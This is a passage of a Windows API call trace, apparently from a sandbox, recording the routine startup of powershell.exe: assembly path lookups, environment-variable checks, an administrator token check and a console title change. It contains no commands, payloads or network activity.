	[0301.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0301.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0302.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0302.296] SetErrorMode (uMode=0x1) returned 0x1
	[0302.296] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cdb20 | out: lpFileInformation=0x1cdb20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0302.296] SetErrorMode (uMode=0x1) returned 0x1
	[0305.896] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.896] CoTaskMemFree (pv=0x3d2890) 
	[0305.897] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.897] CoTaskMemFree (pv=0x3d2890) 
	[0305.897] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.897] CoTaskMemFree (pv=0x3d2890) 
	[0305.899] CoCreateGuid (in: pguid=0x1cdee8 | out: pguid=0x1cdee8*(Data1=0x97293206, Data2=0xf25d, Data3=0x4cdc, Data4=([0]=0x90, [1]=0xab, [2]=0x4b, [3]=0x12, [4]=0xd4, [5]=0x6b, [6]=0xcc, [7]=0xf0))) returned 0x0
	[0305.902] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.902] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.902] CoTaskMemFree (pv=0x3d2890) 
	[0305.905] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.905] CoTaskMemFree (pv=0x3d2890) 
	[0305.907] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0305.907] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.907] CoTaskMemFree (pv=0x3d2890) 
	[0305.912] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0306.801] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cdb90 | out: lpConsoleScreenBufferInfo=0x1cdb90) returned 1
	[0306.805] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0306.805] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cdb90 | out: lpConsoleScreenBufferInfo=0x1cdb90) returned 1
	[0306.806] GetVersionExW (in: lpVersionInformation=0x1cdb20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdb20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0306.808] GetCurrentProcess () returned 0xffffffffffffffff
	[0306.827] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cdbb8 | out: TokenHandle=0x1cdbb8*=0x1a8) returned 1
	[0306.830] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdad8 | out: TokenInformation=0x0, ReturnLength=0x1cdad8) returned 0
	[0306.831] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x327260
	[0306.831] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x8, TokenInformation=0x327260, TokenInformationLength=0x4, ReturnLength=0x1cdad8 | out: TokenInformation=0x327260, ReturnLength=0x1cdad8) returned 1
	[0306.832] DuplicateTokenEx (in: hExistingToken=0x1a8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cdc38 | out: phNewToken=0x1cdc38*=0x1a0) returned 1
	[0306.832] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdad8 | out: TokenInformation=0x0, ReturnLength=0x1cdad8) returned 0
	[0306.832] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x327290
	[0306.832] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x8, TokenInformation=0x327290, TokenInformationLength=0x4, ReturnLength=0x1cdad8 | out: TokenInformation=0x327290, ReturnLength=0x1cdad8) returned 1
	[0306.833] CheckTokenMembership (in: TokenHandle=0x1a0, SidToCheck=0x2d24328*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cdc48 | out: IsMember=0x1cdc48) returned 1
	[0306.833] CloseHandle (hObject=0x1a0) returned 1
	[0306.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0306.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0306.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0306.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0307.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0307.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0307.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0307.674] CoTaskMemAlloc (cb=0x804) returned 0x1b4111a0
	[0307.674] GetConsoleTitleW (in: lpConsoleTitle=0x1b4111a0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0307.674] CoTaskMemFree (pv=0x1b4111a0) 
	[0308.614] CoTaskMemAlloc (cb=0x804) returned 0x1b411a50
	[0308.614] GetConsoleTitleW (in: lpConsoleTitle=0x1b411a50, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0308.615] CoTaskMemFree (pv=0x1b411a50) 
	[0308.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0308.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0308.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0308.618] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0309.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0309.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0310.431] SetConsoleCtrlHandler (HandlerRoutine=0x21e68dc, Add=1) returned 1
	[0310.446] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1a4
	[0310.448] CoCreateGuid (in: pguid=0x1cdd30 | out: pguid=0x1cdd30*(Data1=0x574888d0, Data2=0xe11f, Data3=0x4631, Data4=([0]=0xb2, [1]=0x35, [2]=0xd4, [3]=0x56, [4]=0xaa, [5]=0xd3, [6]=0x28, [7]=0xf1))) returned 0x0
	[0310.450] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.450] CoTaskMemFree (pv=0x3d2890) 
	[0310.465] WinSqmIsOptedIn () returned 0x0
	[0310.465] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.466] CoTaskMemFree (pv=0x3d2890) 
	[0310.466] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.467] CoTaskMemFree (pv=0x3d2890) 
	[0310.467] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.467] CoTaskMemFree (pv=0x3d2890) 
	[0310.468] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.468] CoTaskMemFree (pv=0x3d2890) 
	[0310.468] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.468] CoTaskMemFree (pv=0x3d2890) 
	[0310.470] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.470] CoTaskMemFree (pv=0x3d2890) 
	[0310.471] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.471] CoTaskMemFree (pv=0x3d2890) 
	[0310.471] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.471] CoTaskMemFree (pv=0x3d2890) 
	[0310.473] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0310.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.474] CoTaskMemFree (pv=0x3d2890) 
	[0311.029] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0311.029] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.029] CoTaskMemFree (pv=0x3d2890) 
	[0311.031] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0311.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.031] CoTaskMemFree (pv=0x3d2890) 
	[0311.031] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0311.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0311.031] CoTaskMemFree (pv=0x3d2890) 
	[0312.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0312.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0313.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
